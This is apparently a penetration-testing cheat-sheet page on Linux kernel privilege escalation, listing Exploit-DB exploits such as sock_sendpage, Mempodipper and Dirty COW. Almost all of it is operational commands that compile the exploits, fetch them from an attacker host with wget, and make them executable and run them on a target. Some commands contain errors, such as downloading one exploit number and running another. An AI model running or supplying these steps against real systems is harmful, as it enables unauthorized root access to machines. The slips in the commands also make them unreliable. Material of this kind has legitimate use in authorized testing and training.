Kernel Exploits

Common kernel exploits usage.

**Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1) - **

https://www.exploit-db.com/exploits/9542

If target machine has 32-bit architecture, we compile it with cross compiling at our machine.

$ gcc -m32 -Wl,--hash-style=both -o 9542 9542.c

$ wget http://192.168.1.1/9545 && chmod +x 9542 && ./9542

Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation

https://www.exploit-db.com/exploits/9545

If this doesn't work, we should change the module. - https://bugzilla.redhat.com/show_bug.cgi?id=516949#c24- List of Modules - 24

Line 349 - if ((out_fd = socket({MODULENAME}, SOCK_DGRAM, 0)) == -1)

gcc -m32 -Wl,--hash-style=both 9545.c -o 9545

wget http://192.168.1.1/9545 && chmod +x 9545 && ./9545
linux-sendpage.c (same 9545)
 * Linux kernel versions from 2.4.4 to 2.4.37.4, and from 2.6.0 to 2.6.30.4
 * are vulnerable.
 * For i386 and ppc, compile with the following command:
 * gcc -Wall -o linux-sendpage linux-sendpage.c
 *
 * And for x86_64 and ppc64:
 * gcc -Wall -m64 -o linux-sendpage linux-sendpage.c

Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2)

exploits/linux/local/35161.c

https://www.exploit-db.com/raw/35161

mkdir /tmp/poc
cd /tmp/poc
wget http://192.168.1.1/35161.c
gcc 35161.c -o poc
./poc

Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation

https://www.exploit-db.com/exploits/44298

cp /usr/share/exploitdb/exploits/linux/local/44298.c .
gcc 44298.c -o exploit.php

wget http://192.168.1.1:8080/exploit.php
mv exploit.php exploit
chmod +x exploit
./exploit

Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation

https://www.exploit-db.com/exploits/45010

gcc cve-2017-16995.c -o cve-2017-16995
$ ./cve-2017-16995

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)

https://www.exploit-db.com/exploits/40839

https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c

test$ gcc -pthread dirty.c -o dirty -lcrypt dirty
./dirty
PreviousRelated LinksNextMYSQL

Last updated